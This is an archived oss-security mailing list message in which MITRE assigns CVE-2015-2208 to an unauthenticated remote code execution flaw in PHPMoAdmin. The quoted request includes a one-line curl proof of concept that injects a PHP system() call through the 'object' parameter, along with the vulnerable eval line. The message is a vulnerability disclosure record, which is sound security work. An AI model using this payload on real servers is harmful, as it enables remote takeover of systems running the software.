Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed,  4 Mar 2015 04:31:44 -0500 (EST)
From: cve-assign@...re.org
To: henri@...v.fi
Cc: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: Re: CVE request: PHPMoAdmin Unauthorized Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Can you assign 2015 CVE identifier for unauthorized remote code execution
> vulnerability in PHPMoAdmin <http://www.phpmoadmin.com/>

> curl "http://example.com/moadmin.php"; -d "object=1;system('id');exit"

> http://seclists.org/fulldisclosure/2015/Mar/19

> 693:    eval('$obj=' . $obj . ';'); //cast from string to array

Use CVE-2015-2208.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJU9tCnAAoJEKllVAevmvmsA+oH/A1WfaSkqOcFeboeuhy1nhPS
AwbQrbTIocKxnvLTuG4EbD61zkaFI7hND63BLGEih4GIaI1xlf9X3EL8EmYPSoY8
U8VKpEtJAVQzFWHYobxdKu71WHBGjM0GpF4ckH3XacbkVsluJRoh3BnwCrMZatjn
DI21LBR7tN01x2zqxIEqtVrNsv8ml9P2TLIMlTfMcVTnfCEtrmrcTx+TrWUbHofO
aHBvUOy85Dmm0SQXn3E9z1Nfa7IkpwthrlAANfUp04X15uVV5bbSlv+zjVD9XAtu
UPVYa98JZiZgKp5q7Q/8udG8carcs6uwOmjHqySVxPeVjXWArSDGD1KZhCqVH9k=
=o9Yr
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ